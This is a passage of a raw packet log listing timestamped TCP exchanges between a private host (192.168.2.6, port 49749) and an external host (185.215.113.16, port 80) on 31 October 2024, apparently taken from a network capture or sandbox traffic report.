                                                                            Oct 31, 2024 20:49:20.342797041 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.342891932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.344763994 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.350294113 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.350306034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.350317001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.350363970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.428986073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.429009914 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.429032087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.429148912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.429160118 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.433290005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.460870981 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.460954905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.461045980 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.468888044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.468902111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.468914032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.468969107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.468992949 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.469021082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.469079018 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.547646999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547661066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547673941 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547720909 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547733068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547743082 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.547749043 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.547792912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.547792912 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.587892056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.587905884 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.587974072 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.588001966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.588018894 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.588061094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.634886026 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.634902000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.634912968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.634979010 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.666465044 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.666479111 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.666516066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.666537046 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.666584969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.666596889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.666599035 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.666651964 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.706644058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.706701040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.706712008 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.706818104 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.753472090 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.753577948 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.753590107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.753781080 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.785125971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.785155058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.785168886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.785269976 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.785288095 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.785300970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.785665989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.825551987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.825571060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.825587988 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.825639009 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.825710058 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.872402906 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.872430086 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.872456074 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.872486115 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.903856993 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.903872013 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.903883934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.903925896 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.903954029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.903968096 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.903996944 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.904026031 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.904046059 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.944787025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.944847107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.944859028 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.944988012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.944999933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.945061922 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.948678970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:20.991585970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.991621971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.991632938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:20.991698027 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.022809982 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.022833109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.022850990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.022929907 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.063380957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063422918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063435078 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063498974 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.063522100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063533068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063591957 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.063644886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063693047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063771009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063774109 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.063781023 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.063838005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.110395908 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.110410929 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.110420942 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.110512018 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.110562086 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.141321898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.141541004 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.141611099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.141890049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.141900063 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.141952038 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.182352066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182406902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182416916 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182465076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.182498932 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182511091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182522058 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182533979 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182538986 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.182566881 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.182739973 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.182790041 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.229510069 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.229523897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.229536057 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.229593039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.260684967 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.260699034 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.260710001 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.260744095 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.260792971 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.301589012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301629066 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301640987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301688910 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.301748991 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301791906 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.301831007 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301842928 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301855087 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.301886082 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.302045107 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.302103996 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.348011971 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.348052025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.348062992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.348109961 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.379272938 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.379328966 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.379338980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.379358053 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.379384041 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.420398951 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420556068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420567989 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420581102 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420592070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420603037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420675039 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.420681000 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420802116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420814037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.420933008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.420933008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.466687918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.466757059 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.466768026 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.466773033 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.466840029 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:21.497880936 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.498239040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:21.498300076 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681045055 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681066990 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681078911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681092024 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681104898 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681116104 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681128025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681138992 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681150913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681154013 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681154966 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681205034 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681848049 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681859970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681870937 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681881905 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681894064 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681907892 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681920052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681930065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681941032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681941032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681941032 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681942940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.681957006 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.681984901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.682094097 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682106018 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682116032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682126999 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682138920 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682148933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682159901 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682172060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.682173967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.682173967 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.682235956 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.682235956 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.682992935 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683033943 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683046103 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683057070 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683063030 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.683068037 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683096886 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.683099031 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.683099985 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.683136940 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.685610056 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.685678005 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.968473911 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968607903 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968621016 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968631983 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968729019 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968740940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968753099 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968759060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968805075 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.968857050 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.968866110 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968909025 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.968921900 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969006062 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969098091 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969110012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969121933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969134092 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969139099 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969171047 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969194889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969228983 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969244957 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969310045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969321012 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969332933 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969343901 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969346046 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969372988 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969501972 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969512939 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969526052 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.969540119 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.969566107 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.970082045 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970141888 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970154047 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970180035 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.970328093 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970339060 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970350027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970362902 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970369101 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.970388889 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.970494032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.970530987 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.971041918 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971108913 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971121073 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971132994 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971147060 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.971172094 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.971302032 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971321106 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971333027 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971354008 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.971434116 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.971473932 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.972115040 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972166061 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972177029 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972198963 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.972321987 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972332954 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972342968 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972354889 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.972364902 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.972390890 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.991583109 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991628885 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.991656065 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991668940 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991718054 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.991743088 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991755009 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991801023 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.991873980 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991884947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991894960 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991910934 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991911888 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.991916895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.991945982 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.992095947 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.992202997 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.992911100 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.992959976 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.992971897 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.992995024 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.993110895 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.993122101 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.993133068 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.993144035 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:22.993144989 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:22.993165970 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:23.036932945 CET4974980192.168.2.6185.215.113.16
                                                                            Oct 31, 2024 20:49:23.093410969 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:23.093446970 CET8049749185.215.113.16192.168.2.6
                                                                            Oct 31, 2024 20:49:23.093461037 CET8049749185.215.113.16192.168.2.6
